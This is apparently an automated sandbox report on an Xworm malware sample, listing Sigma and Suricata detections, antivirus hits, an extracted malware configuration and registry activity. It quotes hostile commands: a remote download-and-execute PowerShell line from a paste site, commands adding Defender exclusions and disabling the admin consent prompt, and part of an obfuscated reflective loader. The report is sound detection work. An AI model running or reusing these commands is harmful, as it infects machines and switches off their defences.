Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KHaJDxumDNco{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IrkchjYcpcIHrG,[Parameter(Position=1)][Type]$FKynkUloVt)$wzaPjwDXVrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','Cl'+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wzaPjwDXVrR.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e'+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IrkchjYcpcIHrG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$wzaPjwDXVrR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$FKynkUloVt,$IrkchjYcpcIHrG).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wzaPjwDXVrR.CreateType();}$ZLkQxZedqjGHd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'ati'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$InAbAdJDZoirzm=$ZLkQxZedqjGHd.GetMethod(''+'G'+''+[Char](101)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord , ProcessId: 8096, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3472, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", ProcessId: 7616, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7836, TargetFilename: C:\ProgramData\j3owB.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{ad169925-81d9-44d9-bcaf-9afe899a1c33}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 1156, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3472, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", ProcessId: 7616, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7996, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T18:57:24.806148+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49721	108.181.20.35	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T18:57:18.430079+0100	1810003	2	Potentially Bad Traffic	108.181.20.35	443	192.168.2.4	49716	TCP
2025-03-08T18:57:21.829559+0100	1810003	2	Potentially Bad Traffic	2.238.145.99	443	192.168.2.4	49719	TCP
2025-03-08T18:57:24.856879+0100	1810003	2	Potentially Bad Traffic	108.181.20.35	443	192.168.2.4	49721	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T18:57:14.900812+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49713	23.186.113.60	443	TCP
2025-03-08T18:57:18.429885+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49716	108.181.20.35	443	TCP
2025-03-08T18:57:21.799536+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49719	2.238.145.99	443	TCP
2025-03-08T18:57:24.806148+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49721	108.181.20.35	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\ProgramData\SVrB5SO0.exe	Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\ProgramData\j3owB.exe	Avira: detection malicious, Label: RKIT/Agent.jcceq
Source: C:\ProgramData\cZp98.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Avira: detection malicious, Label: RKIT/Agent.jcceq

Found malware configuration

Source: 00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1"], "Port": 49201, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\cZp98.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\j3owB.exe	ReversingLabs: Detection: 90%
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	ReversingLabs: Detection: 66%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	String decryptor: 127.0.0.1
Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	String decryptor: 49201
Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	String decryptor: <123456789>
Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	String decryptor: <Xwormmm>
Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp	String decryptor: USB.exe

Source: C:\ProgramData\j3owB.exe	Code function: 8_2_00F31321 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,		8_2_00F31321
Source: C:\ProgramData\cZp98.exe	Code function: 16_2_00311000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,		16_2_00311000

Source: unknown	HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.238.145.99:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.82.79:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55613 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55617 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55621 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55628 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.10.182:443 -> 192.168.2.4:55632 version: TLS 1.2

Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbl source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct49A7.tmp.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: BE0A5831\ntkrnlmp.pdbr source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000000.1425700551.00000217A4440000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2426078194.00000217A4440000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.1425603947.00000217A442B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2424589192.00000217A442B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000002.2426865133.00000217A445D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1425764718.00000217A445D000.00000004.00000001.00020000.00000000.sdmp

Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\cZp98.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
